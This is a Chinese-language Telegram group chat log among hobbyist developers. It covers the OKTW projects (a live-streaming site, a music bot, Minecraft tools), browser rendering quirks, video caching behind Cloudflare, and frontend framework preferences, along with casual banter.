反正不夠再買 owo
我可以牽一隻回家嗎 😝
一番賞賣完的可能性居多就是ㄌ
5/25 就發售ㄌ
不行
壞欸 你誰啦 😡
他秉虎
我秉虎
什麼啦 你還幫他說話 QwQ
沒有幫他說話ㄚ
你問他是是誰
@seadog007 被考古 笑死
為什麼我steam打開就跳出 @seadog007
你對我的steam做了什麼
來啊,來買
可是 @cras4202tw 還沒買🤔
那台還沒搞定
[sticker](media:AAQFABNtWt4yAAS4V2hSfSOf3iFQAAIC@telegram)
其實我很好奇
如果全世界的 SSL CA
全部都瓦解的話
是不是不用華為推 5G 就可以世界大亂了
也還好吧 這世界過著沒SSL的時間可是非常長的
Root DNS噴了可能比較慘
你是說45億年ㄇ
[sticker](media:AAQFABMEW8oyAARf5bxqoKPE3PxOAAIC@telegram)
中國有一台喔
沒啊 想當年除了銀行跟超大公司外 什麼鬼論壇討論區都爽快裸奔多久了
更別說LE出來前沒HTTPS的網站也還是一大票(((
雖然現在應該也還是 🌚
目前有五台吧 不算香港的話🌚
四台吧
喔對欸 🤔
我記得是 F, I, J, L
現在會吧 !
香港是五台
一堆USER看到https錯誤阻擋畫面就會嚇得要死了
然後台灣有三台
有點小貴
那種東西一般都多少錢R
哦哦等等我資訊是舊的
不只吧
中國那邊多了一台
也有多了(
offline
香港九台了
台灣好像有六台
一萬多起跳
聖文森進安理會ㄌ欸
看來我大中國有約二十台ㄋ
我覺得
事情不單純喔
OAO
[sticker](media:AAQFABMIdsoyAAQ-yJXHqaedcq0wAAIC@telegram)
怎麼說
這麼多
說不定是美國把拔操作ㄉ
酷喔
p
我覺得我需要跟其他社員談談(
某方面來說,我覺得一個社團的財力敵不過一個 @seadog007 (?
自掏腰包就不用ㄌ
我想出國不要這樣QQ
不用啦,填坑比較實際
[sticker](media:AAQFABN7S94yAASCjjFZa7Iu28JmAAIC@telegram)
🇹🇼 EFFIKL (6)
🇭🇰ADEEFFFIJ (9)
🇨🇳FIJJL (5)
回來好一陣子了吧
是喔
應該是這幾台
是說
香港的那面旗子
是國旗ㄇ
他的財力是後面眾多債主堆出來的 (#
反正也不是只有中國會搞壞root dns
就跟不少大ISP也會不小心搞爛全球BGP一樣🌚
不要出國就能做很多事
[sticker](media:AAQFABNybL8yAAT0lYGr09yKE2MhAAIC@telegram)
那是區旗
想啥,你才是本群財力雄厚的那位吧
所以說香港能有區旗 台灣就不能有台灣區旗嗎 🙃
可能是因為我們是中華民國臺灣省?
南京政府ㄋ
區碼是 01
有8700%就算其他省有省旗台灣一樣不能有 😒
我不要
嗨 我需要借大家ㄉ頭腦一下
為什麼學校會規定只有普通班能考資優班
ㄅ歉 偶迷有
可是不出國就會一直卡著一件事沒完成
🤔
[sticker](media:AAQFABMN5csyAAQ5lBFO9csaOS0GAAIC@telegram)
除了普通班還有什麼嗎?
會卡啥事情
以敝校為例
音樂 美術 語資 數資 科學 資訊
度 我想考資優班
但4學校不讓我考
因為是專長專班?
除非有專長資優班(
🇹🇼🇯🇵🇭🇰🇲🇴🇸🇬🇲🇾🇦🇺🇳🇿可以認出哪些
你只要不能現在立刻馬上說出國就出國的話,你還是先好好填坑再說
反正因為你是專長專班 所以其他科一定不行不用想的概念 😏
可是我就是填坑填到很煩啊....啊啊算了
: (
但是特殊班可以轉去普通班
這時候就可以考ㄌ
那就出國啊,週末出去個十天
還有🇰🇷🇰🇵🇲🇲🇻🇳🇵🇭🇹🇭🇲🇽🇨🇦🇰🇭🇮🇳🇮🇩
你要先證明你是普通人 不然繼續歧視你(X
: (
是啊,所以之後
你不覺得出國卡了更多事嗎wwww
不覺得
還有機會讓你證明你是普通人還不快跪下感謝學校(X
你聽起來沒朋友 🤔
可悲 koru 只是想考個資優班 ;_;
定義「朋友」(笑
就會抓人找事一起做的人阿
[sticker](media:AAQFABO21d8yAATXjVOKGJHUYat9AAIC@telegram)
蛤?之後啥?我不是說你只要不能說走就走就放棄出國念頭嗎
🤔
沒,我 SRE 是打 Single Mode 的
之後想研究 PyPy 大概也得打 Single Mode 吧(
幹,真是「好」朋友
不然先來看個影片
超讚der
SRE 誰和你打 single mode
這種 SRE 不出事還真神奇
可是我社團就真的只有我一個人在維護R
推新功能也得不到 Response,這不是 single mode 是什麼
沒朋友
算了老實說我還有期末考要煩惱,不想吵這個,抱歉
蛤?你先搞清楚 SRE 和 DevOps 和 RD ㄅ
因為資優班已經在資優班裡面了
但4我不是資優班的
那就去好好考試,考完直接出國十天
那你可以先退回普通班
而且也有可能語資想轉考數資 vice versa
以退為進
靠夭逆
合理
技術上無法
聽起來很合理
[sticker](media:AAQFABMnA74yAARH1lhk8LFKzrcCAAIC@telegram)
🤔 感覺 該放生惹(X
你就擺爛讓他退你出去ㄚ
時間問題
喔不你太老ㄌ
然後就會再也上不去了
:(
那是以學期為單位的
放生也是個好選擇
至少成功ㄌ一半
跟 69 遊行一樣
我認真覺得跳槽OKTW是個好選擇
像我們社團就放生了 沒新生QQ
去和 @TsundereChen 說啊
我說過好幾次惹
幫QQ
沒救惹
雖然更大的問題是後台的校計中大爆炸🙃
至少OKTW幾乎每天都有產能
你只好開公司來聘僱他然後壓榨他 (X
@licson 你要移民沒
唉幹那樣要想辦法營利耶
怎麼
怕(?
[sticker](media:AAQFABMEW8oyAARf5bxqoKPE3PxOAAIC@telegram)
就來想啊
我說過我有考慮,你一直逼會讓人原本想跳變成不想跳
笑死 他一直被問
真的喔
笑死
那就算惹,不跳不是我的損失R
@tonyhhyip 話說你要什麼時侯來台灣
now or never
實際上確實有幾個可能的方案 🤔
你有這想法的話不管去哪邊都很吃虧
how many
像是
沒幾個
wut
幹算了要跳就跳,有什麼坑
我都在旁邊看而已(
wwwwwwwwwww
548.8mb / 1.0gb
懂跳wwwww
說好的期末考www
可以等六月底在開始ㄚ
早炸了
記憶體使用掉回去了……
想做哪方面的
怎麼都 Galaxy wwww
還有 MC
因為他是主要專案之一
聽說最近 @james58899 開了一堆坑,轟炸死我了
目前最深的坑
應該十月
滿滿的通知信
https://github.com/OKTW-Network/Liver
這名字 看起來很肝(X
然後就一直待著了嗎
對,我看到也笑了
我甚至不知道這是什麼
笑死
@Sciuridae 出來解釋一下:(
笑死
[sticker](media:AAQFABMEW8oyAARf5bxqoKPE3PxOAAIC@telegram)
Live 網站的 Websocket 伺服器 (?
喔,之前說要搞彈幕的那個
為什麼要想不開用python
用拍森森才好寫ㄅ
不排除提早星期三到埗
你以為 Live Server 可以加個 r 就變成 -er 語態ㄇ
不是node嗎
是說這架構真的沒問題嘛wwwww
Node 也好寫啦
沒有ㄛ
兩個差不多
笑了
只是想不到名字
可是我覺得 async 這方面的功能 node 大勝
pip 和 virtualenv 煩死人
它剛被恨
不是應該還有一堆坑連土都還沒準備的嗎(
是阿
Promise 真D比拍森森的 笨 yield 好用
[sticker](media:AAQFABPDn8oyAAQhzQkq7iuiGIk1AAIC@telegram)
那你在香港的財產怎麼辦啊 先擺著?
我覺得那倒還好
goroutine 更好用 (#
(
來推廣Crystal (X
可是它ws聽起來就雷雷的
[sticker](media:AAQFABPDn8oyAAQhzQkq7iuiGIk1AAIC@telegram)
還好ㄅ
Js超棒
你有打算逃難嗎
我忘記我有沒有問過了
[photo](media:AgADBQADeKkxGxME8VeINKO9Gd2pnXRT9jIABCi7_aQeHI0aHWYEAAEC@telegram)
我覺得可以,看起來很潮
問過了
[sticker](media:AAQFABN1IdsyAAQz9HsK8LoEVHoAAwI@telegram)
目前比較熱的坑是直播網站和minecraft相關
不過說真的Crystal還是不大適合搞大專案
常常一直在breaking change
真的會改到死
啥時才能stable啦QQ
短網址呢
Liver(X)
Laiver(O)
好ㄛ
然後是涼掉的音樂bot系列
那個是還沒出土系列
直播網站看起來很好玩
不知道在台灣生活如何
水生火熱
可是我們都用來直播母湯的東西說
[sticker](media:AAQFABMEW8oyAARf5bxqoKPE3PxOAAIC@telegram)
水深火熱
旅行只到過6-7次
你是說全client生poster吃爆你流量的那東西嗎(X
還有遵守KISS和造輪子原則
隨便都母湯
wwwwwww
[photo](media:AgADBQADeakxGxME8Vdot5RJgebAcfdZ9jIABKD028c1snD5Um0EAAEC@telegram)
未來應該會常常去
洨安原則
都有某隻熊貓直播非常母湯的東西
它現在會動了
可以這樣搞ㄛ
完全不防 SPAM ㄏㄏ
[sticker](media:AAQFABPDn8oyAAQhzQkq7iuiGIk1AAIC@telegram)
首頁就棒棒一根在那裡那種
戳下去先噴個幾百MB流量吧我想
[photo](media:AgADBQADYqgxG9DG8Vf8pKmgyQIoQA1O9jIABCNAMupinPl78GcEAAEC@telegram)
[photo](media:AgADBQADYagxG9DG8VeSNQwYgoCIPf5q3jIABFoCWoaFXM5MO_AFAAEC@telegram)
然後手機板chrome有可能OOM然後js就噴了
[sticker](media:AAQFABMN5csyAAQ5lBFO9csaOS0GAAIC@telegram)
umm 他真的母湯嗎?我覺得只是因為你們覺得母湯(#)我覺得那些直播其實很可以(#)
喔不,iOS不會動
[sticker](media:AAQFABOCcMoyAAQTZWQ26jxYbkQGAAIC@telegram)
有啊
只有你在炒熱啊
[sticker](media:AAQFABO9nd8yAASitGAdnAQNyVMgAAIC@telegram)
最近播放器的 cover image 不會動
可能 Hentai_Panda 比較適合(?
它用video當canvas的source整個很buggy
沒救
要換個模組
不會吧
edge更厲害,video被GC之後canvas會一起黑掉
為啥直播網站會 OOM 🤔
會阿
用到的東西不是只有 video 跟 ws ㄇ
正確來說safari全家都死(
wtd
不是應該canvas在video上面overlay嗎
你連結是甚麼 🤔
可能世界線不同(
不是我啦
因為那是我用來炸瀏覽器的東西wwww
正常的東西在/下面
喔我是說能動的
wwwwww
全部都是 MC related...某種意義上真棒(
你們直播用啥ㄚ
dash.js ㄇ
https://live.oktw.one/record.html
你看你能看到幾張圖
正確應該要三張
hls
dash和cloudflare有仇
喔不
三張沒錯
:(
它整個cache不到
高級 這很R18 (
dash 原來跟 CF 有仇喔
對,我不知道為什麼
總之用dash它就整個不會cache了
~Cache Everything~
有設
~Page Rule~
它幾乎全部都miss
[photo](media:AgADBQADY6gxG9DG8VcdRjMclNYD7A9d9jIABMAz_wyXfO6sHGEEAAEC@telegram)
~ *.host/* ~
[photo](media:AgADBQADeqkxGxME8VcBjH0XUdK_6gZr3jIABP9_bnNH9qhE2PAFAAEC@telegram)
[sticker](media:AAQFABMUhPYyAARRH2d7D8KM0DxsAAIC@telegram)
render很有事(
我要把 Safari 當成 IE 看
真的
給你滿滿的卷軸
它可能比IE還慘
不是白就是爛
不是當,他就是
中國變已開發國家ㄌㄟ
甚至我覺得ie11比他好一點
Hls大法好
因為很重要 所以顯示一次不夠 行(
土地開發ㄇ
肛門
ie11起碼不會在vh這種最基礎的功能上面爆炸
對 safari很白 超白(
賣給自己美國公司
[sticker](media:AAQFABMN5csyAAQ5lBFO9csaOS0GAAIC@telegram)
手機板firefox應該只有第一張
長度單位也能壞掉真的不敢相信
edge可能佛系出現
我第一次看到同樣東西每次看每次不一樣的
[photo](media:AgADBQADfKkxGxME8VdRGAzgdd3mb5pW9jIABC1vUkzgmyT5a2YEAAEC@telegram)
那大概是載入順序不同造成的
過氣瀏覽器
該扔了好嗎,都那時候了還不支援 fetch
不,聽說是用video當source時,第一張會抓不到
[sticker](media:AAQFABOCcMoyAAQTZWQ26jxYbkQGAAIC@telegram)
[photo](media:AgADBQAD3agxG07u8Vd3nJAt4cJQWMZv3zIABGHdMScLA7d7QmAFAAEC@telegram)
放個 polyfill ㄚ
ie只是不支援的功能也夠多
他不至於
Well yes, but actually not
幹嘛放,為啥我要為了那史前時代用戶浪費大家流量
為什麼我覺得直接抓圖片的預覽畫質比我用影片生出來的差
@mmis1000 你怎麼說
啥 不是被 CDN 快取ㄌㄇ
safari就各種well yes, but actually not
用戶是不是還是得下載
喔下載流量喔
(
那沒差啦
因為我壓縮開好開滿
你有想過 3G 用戶的可憐嗎?
他才看不起直播
不,你沒想過,你只在乎自己
[sticker](media:AAQFABMhxfYyAARq-4tnA6POOa5jAAIC@telegram)
難怪會被我討厭 (#
嗚嗚嗚嗚嗚我要討厭你五分鐘
從 40 到 4f 我都討厭你
怕 原來safari有支援(
iOS 11 還 12 才支援的吧
沒有
好 我順利活著回來了
诶,原來當初是png
:(
因為他只想自己
我以為開個網頁需要200MB是正常的
那...就ggmpeg搞事
靠杯
都什麼時代了還在用史前網路 (O
電梯裡 (#
面對明天期末考跟期末報告
[sticker](media:AAQCABOtTEsNAAST8jmCsle4jiaXAAIC@telegram)
那啥,扔掉啦 (#
史前網路配史前瀏覽器
合理
可是我手上沒這種東西
期末報告直接拿SITCON簡報
或是因為我都結第一幀
嗚嗚嗚有沒有人要教我傅立葉 q__q
沒事 我常坐法拉弟籠電梯 連2G都假的(
老師根本沒上就說要考ㄌ
好,行,聽說是我的建議 (?
:((((((((((
[sticker](media:AAQFABOCcMoyAAQTZWQ26jxYbkQGAAIC@telegram)
[photo](media:AgADAQADKagxG9KW8Ucq1assyUQuMvwfFDAABJhbB2L9f2DnzIYCAAEC@telegram)
是不是連顏色都不一樣了
很 8bit 呢
他一臉沒dither
canvas 生圖片不是有解析度限制ㄇ
有嗎
沒吧
不對阿。這有 320 * 640 嗎?
我阿災
高畫質(
我記得有 dpi 限制之類的
96 dpi ㄅ
我覺得我圖才沒弄這麼小
沒ㄅ
[photo](media:AgADAQADKqgxG9KW8UfFcdBx6Be_Db8TFDAABMFRZcuXV0oHB4kCAAEC@telegram)
開原圖看看?
有差嗎 手上不是最新版本還敢說用蘋果嗎(X
尼怎麼生ㄉ
[photo](media:AgADBQADfakxGxME8Veq-ZrIuKlp6Q1W9jIABJd7iG71tQABXKdqBAABAg@telegram)
原圖很清晰阿
[photo](media:AgADAQADK6gxG9KW8Ufl1FBDmdStJNcQFDAABHA0RZDJq6v75owCAAEC@telegram)
你的瀏覽器搞事吧
到你是哪個顏色錯了
[sticker](media:AAQFABOLkMsyAATlerfU-o5A3PcMAAIC@telegram)
那兩張圖當然是我直接戳螢幕截圖來的阿
[sticker](media:AAQFABMEW8oyAARf5bxqoKPE3PxOAAIC@telegram)
從video生的自己看原始碼
[photo](media:AgADBQADf6kxGxME8Vdsh7pxJO_gkmhz3zIABImujqvG-8oXh18FAAEC@telegram)
他有 96dpi ㄉ限制 🤔
庫欸
其實我可以不要toDataURL
它都是canvas了,我大可直接顯示出來
um 對啦
我的眼睛告訴我這張的顏色是錯的
[photo](media:AgADBQADgakxGxME8Vf59sS7qUcdpHn03zIABHnALEnhixDjeWQEAAEC@telegram)
我看起來不一樣wwww
還是單純對比問題?
[photo](media:AgADAQADLKgxG9KW8Ud_kao3V0UTgaRqDDAABJEgSRBGzA5QawYFAAEC@telegram)
仔細看了一下脖子後面陰影...一樣才怪
@james58899 你確定 Galaxy 不是黑洞嗎
chrome整個比較黑
你覺得宇宙有多大
那個 Paper 有夠長的,滿滿的 Spec
謝謝
...行,難怪叫 Galaxy
喔對paper不只這一份
勸你是不要搞 Galaxy (
還有k8s架構的文件和其他一堆東西的
所以再場的每個瀏覽器截同一張圖還不一樣
地表最深的坑
我正在看有什麼可以跳的坑,不過看起來都是 Java or JS
感覺就是苦手
太厲害了
JS 不好ㄇ
我不會 JS (
:(((
所以我才在問你想做什麼的阿
難怪對畫畫的矯色是大坑
反正我肯定可以生一個坑出來給你
我看 JS 好像也沒多少
不然你來玩k8s好了
[sticker](media:AAQFABO21d8yAATXjVOKGJHUYat9AAIC@telegram)
可是都是 MC related 對不對
沒阿,你看直播網站就不是
音樂bot也不是
我在說什麼 OKTW 欸,怎麽可能扯不上 MC
直播 MC
MC 遊戲配樂
你看,找到關聯啦
你網站打開有看到minecraft嗎wwww
沒有,是寫code的時候需要配音樂
直播mc用政經直播網站就好啊
然後就生出這個專案了
就是因為正常網站用了帳號會母湯,才需要自價阿
直播是,唉幹YT社群規範好煩自己架好了
然後就出來惹
[photo](media:AgADBQAD36gxG07u8VdtDvirVVTxKX-B3zIABF3cNa2YMiLf82AFAAEC@telegram)
我只看到 BSOD (逃
我記得是隔天就出來了能用了
有沒有考慮自己架音樂網站ㄚ
Liver是有人說要彈幕就出來了
那個在音樂bot的TODO裡面
Liver
反了吧wwwwwwww
他是內建bot功能的音樂DB
[sticker](media:AAQFABMEW8oyAARf5bxqoKPE3PxOAAIC@telegram)
喔是播放功能
中小型的專案好了,我不介意學 Java
目前開發流程最完整的就是galaxy啦,可是它入坑門檻有點高耶
我看起來也是
雖然我也差不多((
不過我只有自己用所以從沒搞過錄影回放((
對你來說不存在中小型專案對吧,每個坑深度都是人掉下去一分鐘聽不到落地聲那種深度(?
額,有啦
大概是 node_module 的深度
這個應該是最小的坑了
其實要做很快吧 🤔
它現在缺discord支援
問題在沒人做
如果只要放的話(
我的有 msgr 支援(
你可以merge一下
[photo](media:AgADBQADgqkxGxME8Vdqv2YZIxChK2RN9jIABL4lcyYjAfEEiWYEAAEC@telegram)
還是有人對我的pixiv桌布有興趣 🤔
總之merge下去,conflict再說
這個issue需要被close
... JS 嗎
好吧我去學 JS
叫他自己compile一個(O
唉你要往好處想他不是TS
幹奇怪不對啊我怎麽會一直把自己往下埋🤔
幫你覆土澆水
TS
大失敗
[photo](media:AgADAQADLagxG9KW8UfuEkv35PAlVeP_CjAABC2ypDfWVhIxExEEAAEC@telegram)
A你敢嘴
我的音樂 bot 才是坑吧(#
我覺得需要幫他更新一下
一般來說先搞台icecast再說
雖然可以像licson一樣連stream server都自己幹(
我覺得,問題在於你的環境太穩了,不太需要考慮會爆炸的悲劇環境
[sticker](media:AAQFABMEW8oyAARf5bxqoKPE3PxOAAIC@telegram)
我不打算stream阿
可是這會捲斯大大德環境...
直接把檔案pipe給browser不就好了
🤔 還有什麼坑嗎
還有hiner:
可愛 206
還有7月的動漫清單沒人去填表
🤔
幹我忘記填了
:((
快去
[sticker](media:AAQBABN1JtQvAATde6D7VZMdvhNQAAIC@telegram)
如果你要默認所有瀏覽器都支援OPUS也不是不行啦(((
明天考完再說
不是ㄇOAO
不支援當然去死阿
現在都要2020了
你知道我們ON官網直接預設所有瀏覽器都支援webp嗎
live broadcast沒在206的,頭補好就直接把後密的東西扔過去了
當然永遠200
4134:
只是每次開頭都不一樣
:(
[sticker](media:AAQFABNybL8yAAT0lYGr09yKE2MhAAIC@telegram)
我覺得不是這問題
🤔 其實也差不多都有了啦 除了safari還是很奇耙外
它沒有嗎
都支援vp9和webm了
他居然沒有...?
有啊 但他認包裝(
opus in ogg 支援就好吧
放生
學學 MP3 這個沒標頭的格式
反正也沒什麼看過其他種
直接吃到 frame 就會如何播的
這有什麼特別要的功能嗎
前面的垃圾自己無試
還有人提到要支援XMPP(
壓縮率:
ogg好像比較最近的事吧
之前好像是啥奇耙格式才吃(((
SITCON還是COSCUP提到的吧
ogg 的話要像 @mmis1000 以前幹的好事一樣
...好吧我就研究看看
改頭
你確定嘛www
每個 packet 都要在前面補上超長一段meta
那個優先度低
因為現在沒在串XMPP的阿
都是IRC和TG還有discord
🤔
那就列在 future
這裡都不會有從 IRC 來的訊息了(
我以為future === won;t do
但現在這裡有discord惹
dkg
不過還是要先長個HTTP server來著 🤔
可是你正在用 Telegram,你是希望 Discord 就可以搞定你所有訊息群組嗎
沒阿,TG的貼圖比較好用
而且檔案大小比較大
雖然我discord也能傳50MB
你有付費?
50MB 連個片片都不夠(喂
很貴
[sticker](media:AAQFABMEErIyAATTddJ0Y7mhVpQgAAIC@telegram)
感覺浪費錢
你買了有什麼特別好用的功能嗎
沒錯 論片還是TG好
[sticker](media:AAQFABNDpd8yAATUDKXoP8lAx0IkAAIC@telegram)
可以讓ON上128kbps
ON ?
然而音樂bot早就...
[photo](media:AgADAQADLqgxG9KW8UclFDv625-4618GCzAABGOtdAJn5REz3xUEAAEC@telegram)
[sticker](media:AAQFABP9MdsyAATJS7cAASflHeBfgAACAg@telegram)
.....
為甚麼 web 版 TG 迄今還是這麼難用
笑死
因為沒人用
:(
靠腰我發現我discord邀請連結的背景忘記拿掉了
有差嗎
有,很油
啥背景?
你看超油
我覺得可以
[sticker](media:AAQFABOJJx0sAAQeYKfU8XnhsvFqAQABAg@telegram)
不夠油
og image 也會一起換ㄛ ㄏㄏ
靠背
有差嗎
說起來這隻在哪啊
是說OKTW裡根本只有放Galaxy(((
本來就是油到會滑倒的群組,有差嗎
在我下面
因為到目前為止都是我單刷阿
🤔
還有一個跟galaxy半點關係都沒有的伺服器插件
我還問過有人要幫忙搞的話,我可以移去OKTW下
然後就沒人理我了
好 又是TS 放生(X
我也這樣覺得
還有個我照抄來的模組喔喔喔喔
很有幫助
今天早上還被按星星
[photo](media:AgADBQADhKkxGxME8VfKGcK4Hbd8xEp93zIABHHHQCS0eXTpTGAFAAEC@telegram)
[sticker](media:AAQFABM8LNsyAARLq9UUFu5g2Il9AAIC@telegram)
行 這commit log (
我也是這樣的
我只是陳述事實
它ㄊㄇ超笨
之前打算搞 然後TS :DDDD
mongodb的_id就會自動生成喔,幹麻強迫我設值
nullable又超煩,各種null check
因為寫def的亂寫
看來要多個Web.ts或者HTTP.ts 🤔
Web好了 不然還有HTTPS (?
不過實際上應該要串reverse proxy ?
常有的事(
所以根本TS問題 該改了(X
對,然後再hardcode一個bind type用來登入和綁定帳號
[photo](media:AgADAQADL6gxG9KW8Udv7raS2pLO9rEgFDAABOlWQDlk6BRuwYoCAAEC@telegram)
🤔 還要帳號感覺就麻煩 再說有OKTW SSO嗎(
沒有,就是生一組token然後bind
我記得當初是想說直接用TG登入
其實discord應該也可以登入 🤔
🤔 也不是不行
雖然我比較喜歡直接anon 多方便(
總之取到user之後就可以戳listmanager取歌單了
有歌單之後再戳audio manager取檔案這樣
夠簡單了吧(#
我比較想直接rand gen token然後存session
登入什麼的太麻煩了 🌚
[sticker](media:AAQFABOCcMoyAAQTZWQ26jxYbkQGAAIC@telegram)
唉對耶OKTW SSO
@mmis1000 @Haraguroicha 你們怎麼說
[photo](media:AgADAQADMKgxG9KW8UexMEu47Z4yoVd1DDAABDA0Qqms4UcUTA8FAAEC@telegram)
我決定我要去睡覺
三小
不是填坑嗎
我都在睡覺時思考的
或是在思考時睡覺
跟周公討論規格嗎
原來周公是 PM
聽起來坑很大 雖然我自己也有SSO 煩死(O
[sticker](media:AAQBABN1JtQvAATde6D7VZMdvhNQAAIC@telegram)
[sticker](media:AAQFABO-j8oyAATxr7o8mBxJjBBNAAIC@telegram)
看完感覺Web做起來會很播放器(
這感覺就應該讓CF cache好cache滿((
他就是播放器
其實主要應該是管理清單的功能啦
你知道TG按鈕很機掰
我只會想getAll然後噴給client自己搞
然後Web整個RO ((
聽起來很可以阿
可是沒管理介面的話還是要繼續戳TG的按鈕
管理介面另外生
然後不驗證 那是HTTP server的事(X
[sticker](media:AAQFABO-j8oyAATxr7o8mBxJjBBNAAIC@telegram)
還是要驗證阿,因為歌單有擁有者
🤔
然後 @jimchen5209 還加了個admin的功能
不過我還沒仔細review
這還是先等OKTW SSO生出來再說(X
說起來我有時間還要生個keycloak的tg fed plugin來著 好懶(
[sticker](media:AAQCABNpkUYOAAR0_NrTr3sMS81FAAIC@telegram)
什麼 s/admin/visitor
keycloak-russian-providers沒有TG實在太不合理了(X
不用自己寫惹
這樣感覺沒幾分鐘就能寫完了(X
不過要怎麼跟原本的東西塞起來才麻煩 🤔
或者UI跟後端分開不同Proj 聽起來很合理((
你可以建一個資料夾叫做web
只有mounted沒有before destroy…
然後裡面塞一堆有的沒的
我也沒寫before destroy(逃
不過我的是真的single page就是
除非關掉頁面不然所有東西都會一直用(((
可是用v-if就會觸發了
🤔他這邊大概會script append到天邊去(((
不過有必要在mount裡append嗎 我會直接在template裡放script tag (
反正這年頭瀏覽器script tag放哪都會動吧 🤔
我看過不少人 @Sciuridae 把script放到</body>後跑的
[sticker](media:AAQFABPjs8syAATnmQrVKD56k3kkAAIC@telegram)
不過其實直接放navbar永遠不要讓他消失就沒毛病了(X
正常還是會放body裡吧... 雖然也不是不行
對啊,誰用 iPhone 還沒 iOS 13 的都去填海
說來我還直接用v-if來開關css file來著 🌚
還是塑膠啊幹
不過看完才發現
我根本不需要用到這plugin吧
他就只是拿了tg widget放上去而已
自己寫就好惹(((
那你一定看得不夠多,我看過超過 50 頁 A4 的 spec 文件過
那就短網址坑啊,你可以先從土壤生成開始
自選語言
重點是一次性或能重複使用啊…
感覺可以動工惹耶 雖然要先搞定API backend(
我覺得我們的應該也有10頁了
這個是要把 ts-node 換成 golang 的坑ㄅ
用啥寫好啊🤔
我去填 chat-bridge 好了,都選好惹
幹,之前不是 B- ㄇ
倒是為什麼 OKTW 不開 Patreon 🤔
我幫你修好了
有沒有很感動
有啥推薦的api framework嗎 🤔
express(#
喔對,都幾天了
其實官網有斗內按鈕
是可以啦(
在想最近有沒有啥新東西
不過後端好像有點萬年不變(X
就說給你權限也不會填
[sticker](media:AAQFABMUgPYyAASC__sGiVNxGAgVAAIC@telegram)
有 native client 為啥一定要糾結在 web client 啊
而且我覺得現在的狀況斗內下去也沒啥可以回饋的
本來就(
拜託java都還活得好好的了
你可以用 GraphQL
我的SSO現在也很JAVA 不如說現有SSO方案都很JAVA (
不表態
[sticker](media:AAQFABMEErIyAATTddJ0Y7mhVpQgAAIC@telegram)
GraphQL
這年頭有人連鐵筷都給你當一次性使用的了,有差嗎
我覺得musicbot用這感覺好麻煩(O
???
有,我想知道是哪幾個 commit 的坑
但是你的資源不會亂掉(O
我記得昨天HWD才在說拋棄式平底鍋🤔
不要這東西好嗎
阿你家筷子都一次性的ㄇ
我覺得在這之前先確定musicbot本身不會噴掉(?
我就遇過啊,眼睜睜的看完他用完就扔了
我會洗好嗎
幹那就對了啊
洗完就丟ㄌ
我自我感覺他很穩
我只是表達不是所有人都會覺得那可以洗
?????
他不就
標榜
可以洗
他活在 PUBG ㄇ
不洗的人
幹嘛買
我怎麼知道
別人送的R
??????????
好,你說得對
幹那是極少數ㄅ
沒洗都該拿去填海
好好好你說的對
我還是在想web ui要不要整到上層package.json裡 但感覺超麻煩(((
不要
聽起來很噁心
還要webpack
我討厭他
可是你知道ㄇ
Vue一般而言用起來很webpack 🌚
很多飲料杯看起來整個很可以洗一洗再繼續用,但還是一堆人把它丟了阿
鬼扯
好啦 是不用(
但cli很webpack (
[photo](media:AgADBQADZqgxG9DG8VeCSRa_A7udY0Lx3zIABPxeJjLso5B-FGMEAAEC@telegram)
vue當JQ用喔
完全不用這堆東西啊,看看這個 https://github.com/CCIP-App/Portal
已經吧
[sticker](media:AAQCABNO5IUqAATeIevOrCUXBb8KAAIC@telegram)
對,讚
當JQ用
對啊,多棒
@yoyo930021 最愛的用法
不route不拆component的話行啦
當初我也是想叫 @Sciuridae 這樣用
幹就沒 route 沒 component 能用吼
[sticker](media:AAQFABMEW8oyAARf5bxqoKPE3PxOAAIC@telegram)
結果他生出了一堆.vue檔案出來
一個 submit 就去 github 了
我也不好說什麼了
用啥鬼 route 啦
[sticker](media:AAQBABN1JtQvAATde6D7VZMdvhNQAAIC@telegram)
可能檔案多比較潮,就和 java/kotlin 一樣 (#
route不一定要用 但component
如果不大沒差啦
但東西一大沒component很煩 超煩
他cli就很方便,比手動複製貼上script tag還快阿
邊寫邊學啦
又沒多難
對啊 超無腦好用(((
chrome 就能 debug 了
vue create 就生出那些東西
是有多難
我也沒辦法

就說不要用 cli 去開專案吼
什? 我沒有什麼都用 Vue 好不
同樣的元件copy paste好幾次很崩潰好嗎
能幫我都通通搞定我幹嘛自己搞
改起來一樣崩潰到炸掉
我沒這樣說過啊,我只有說你很愛這種直接用的寫法
我都用 jQuery 給你們參考
我都造輪子 給你們參考
不過music bot的ui可能還好
snippet R
親愛的 last.fm API 為什麼不給我吐我要的圖
然後大家看到的只有一條線。
為什麼npm不能有sub package.json
能吧,我記得我用過?
你要幹嘛wwww
vue create
vue add router vuex axios
你看,專案好了
然後src看起來一樣崩潰
[sticker](media:AAQFABMN5csyAAQ5lBFO9csaOS0GAAIC@telegram)
這個時間點你還在google找vue的script tag怎麼寫
就專案底下塞子專案阿
其實我不常用這個...
但就算當 JQ 用 我也覺得沒什麼不好
你不用 cli 也有 component 能用啊
把vue當JQ用很讚
所以我才拿出來說可以參考啊,多虧 @coin3x 幫改前端,不然原本的根本太 @DennyHuang 拿不太出來見人 (#
[sticker](media:AAQEABOkw54ZAATQ5-9cppq0mzcdAAIC@telegram)
那叫做KISS
我覺得小專案很適合 就是了
不過如果是現成網頁加東西,那就當jquery用吧
是不用啊 但你還是要生個template 然後寫起來很崩潰
或者也可以拆一堆檔案啦
而且我就是喜歡vue檔 不服來戰(X
別折騰 refactor
但Music bot連網頁都沒有(
我也喜歡 yay
然後 vscode 炸掉給你看
vscode炸了不甘我的事(O
vscode挺穩的
這樣的確比較 developer friendly
所以適合 中大型專案
Telegram比較常炸
我無法反駁
每次mac起飛都是Telegram在memory leak
沒這麼容易炸啦
除非你寫大型的
或 chrome 的 gpu usage
Desktop 版? 還 mac 版?
手上就是滿滿大型 (#
我是後者
desktop吧…?
忘了
和 windows 或 linux 看起來一樣介面的就是 desktop
必炸
可是我覺得 mac 版沒有很容易炸
只是對輸入法不友善
有大型網頁嗎(
我只遇過checkout差很遠的branch時當掉
我常常字打到一半就被送出了
一次改幾十個檔案那樣
怒爆
我的照三餐炸,隨時都要重開,不過輸入法超級不友善,可是有 workaround 方法
像是改群組名的地方
這快算mac輸入法通病了
好,目前沒有
超多程式對mac的輸入法毛多到噴滿地
不 ey
你光選字就可以觸發到他回上頁的功能,就白編輯了wwwww
真的
我覺得其實是untested(?
就不能學windows輸入法把整個輸入都吞掉嗎
反正能編過就出貨了
所以就說用 Linux 吼
然後玩Minecraft就會卡鍵這樣
應該是西方沒有這個問題
mac用戶少,犧牲掉沒毛病
